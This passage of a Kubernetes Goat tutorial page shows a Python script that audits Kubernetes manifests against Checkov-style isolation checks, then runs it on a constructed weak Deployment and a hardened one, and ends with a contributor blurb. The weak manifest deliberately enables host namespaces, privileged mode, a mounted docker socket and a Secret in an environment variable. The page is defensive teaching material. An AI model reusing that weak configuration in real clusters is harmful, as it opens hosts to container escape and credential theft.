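    return spec["template"]["spec"]


def audit(manifest: dict) -> list:
    """Return (check_id, detail) for every failed check, pod-level findings first."""
    out = []
    meta = manifest.get("metadata", {})
    name = f"{manifest['kind']}.{meta.get('name')}"
    if meta.get("namespace", "default") == "default":            # CKV_K8S_21
        out.append(("CKV_K8S_21", f"{name}: default namespace"))
    if manifest["kind"] not in WORKLOADS:                         # Service, Secret, ...
        return out
    pod = pod_spec(manifest)
    pod_sc = pod.get("securityContext", {})
    for key, cid in (("hostPID", "CKV_K8S_17"), ("hostIPC", "CKV_K8S_18"),
                     ("hostNetwork", "CKV_K8S_19")):
        if pod.get(key):
            out.append((cid, f"{name}: {key}=true"))
    # CKV_K8S_31: only the securityContext form is handled; the legacy pod annotation is not
    if pod_sc.get("seccompProfile", {}).get("type") not in ("RuntimeDefault", "Localhost"):
        out.append(("CKV_K8S_31", f"{name}: no seccomp profile"))
    for vol in pod.get("volumes", []):                            # CKV_K8S_27
        if vol.get("hostPath", {}).get("path") == DOCKER_SOCKET:
            out.append(("CKV_K8S_27", f"{name}: volume {vol.get('name')} is the docker socket"))
    if pod.get("automountServiceAccountToken", True):             # CKV_K8S_38
        out.append(("CKV_K8S_38", f"{name}: service account token auto-mounted"))
    for i, c in enumerate(pod.get("containers", []) + pod.get("initContainers", [])):
        cname, sc = f"{name} (container {i})", c.get("securityContext", {})
        caps = sc.get("capabilities", {})
        if sc.get("privileged"):                                  # CKV_K8S_16
            out.append(("CKV_K8S_16", f"{cname}: privileged"))
        if sc.get("allowPrivilegeEscalation", True):              # CKV_K8S_20 (explicit false needed)
            out.append(("CKV_K8S_20", f"{cname}: allowPrivilegeEscalation not false"))
        if not sc.get("readOnlyRootFilesystem"):                  # CKV_K8S_22
            out.append(("CKV_K8S_22", f"{cname}: writable root filesystem"))
        if not (sc.get("runAsNonRoot") or pod_sc.get("runAsNonRoot")):   # CKV_K8S_23
            out.append(("CKV_K8S_23", f"{cname}: may run as root"))
        if caps.get("add"):                                       # CKV_K8S_25
            out.append(("CKV_K8S_25", f"{cname}: adds {caps['add']}"))
        if not {x.upper() for x in caps.get("drop", [])} & {"NET_RAW", "ALL"}:   # CKV_K8S_28
            out.append(("CKV_K8S_28", f"{cname}: NET_RAW not dropped"))
        image = c.get("image", "")
        if "@sha256:" not in image:                               # CKV_K8S_43, then CKV_K8S_14
            out.append(("CKV_K8S_43", f"{cname}: {image!r} not pinned by digest"))
            if image.rsplit("/", 1)[-1].partition(":")[2] in ("", "latest"):
                out.append(("CKV_K8S_14", f"{cname}: {image!r} has latest/blank tag"))
        for env in c.get("env", []):                              # CKV_K8S_35
            if "secretKeyRef" in env.get("valueFrom", {}):
                out.append(("CKV_K8S_35", f"{cname}: env {env['name']} holds a Secret"))
    return out


# Constructed weak manifest combining the host-namespace, privileged, docker-socket and
# secret-in-env patterns reported in the table (assumed names; not a project file).
WEAK = {"apiVersion": "apps/v1", "kind": "Deployment", "metadata": {"name": "demo-monitor"},
        "spec": {"template": {"spec": {
            "hostPID": True, "hostNetwork": True, "hostIPC": True,
            "volumes": [{"name": "dockersock", "hostPath": {"path": DOCKER_SOCKET}}],
            "containers": [{
                "name": "monitor", "image": "example/monitor:latest",
                "securityContext": {"privileged": True},
                "env": [{"name": "API_KEY", "valueFrom": {
                    "secretKeyRef": {"name": "demo-vault", "key": "api-key"}}}],
                "volumeMounts": [{"name": "dockersock", "mountPath": DOCKER_SOCKET}]}]}}}}

# Constructed hardened form of the same workload: every check above passes.
HARDENED = {"apiVersion": "apps/v1", "kind": "Deployment",
            "metadata": {"name": "demo-monitor", "namespace": "monitoring"},
            "spec": {"template": {"spec": {
                "automountServiceAccountToken": False,
                "securityContext": {"runAsNonRoot": True, "runAsUser": 10001,
                                    "seccompProfile": {"type": "RuntimeDefault"}},
                "volumes": [{"name": "vault", "secret": {"secretName": "demo-vault"}}],
                "containers": [{
                    "name": "monitor", "image": "example/monitor@sha256:" + "0" * 64,
                    "securityContext": {"allowPrivilegeEscalation": False,
                                        "readOnlyRootFilesystem": True,
                                        "capabilities": {"drop": ["ALL"]}},
                    "volumeMounts": [{"name": "vault", "mountPath": "/run/secrets/vault",
                                      "readOnly": True}]}]}}}}

if __name__ == "__main__":
    for label, m in (("weak", WEAK), ("hardened", HARDENED)):
        print(f"{label}: {len(audit(m))} finding(s)")
        for cid, detail in audit(m):
            print(f"  {cid}  {detail}")
```

Running it prints fifteen findings for the weak manifest and none for the hardened one. Note two design points that mirror how the real checks behave: `allowPrivilegeEscalation` and `automountServiceAccountToken` fail when they are merely absent, because the Kubernetes default for both is permissive, and dropping `ALL` satisfies the NET_RAW check because it is a superset. Probe and resource checks (CKV_K8S_8/9/10/11/12/13) are left out since they are availability rather than isolation controls.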

Getting Involved

First of all, thank you for showing interest in Kubernetes Goat; we really appreciate it.

Here are some of the ways you can contribute to Kubernetes Goat:

  • By providing your valuable feedback. Your honest feedback is always appreciated, no matter if it is positive or negative :)

  • By contributing to the development of the platform and scenarios

  • Improving the documentation/notes

  • By spreading the word and sharing it with the community, friends and colleagues

Follow on Social Media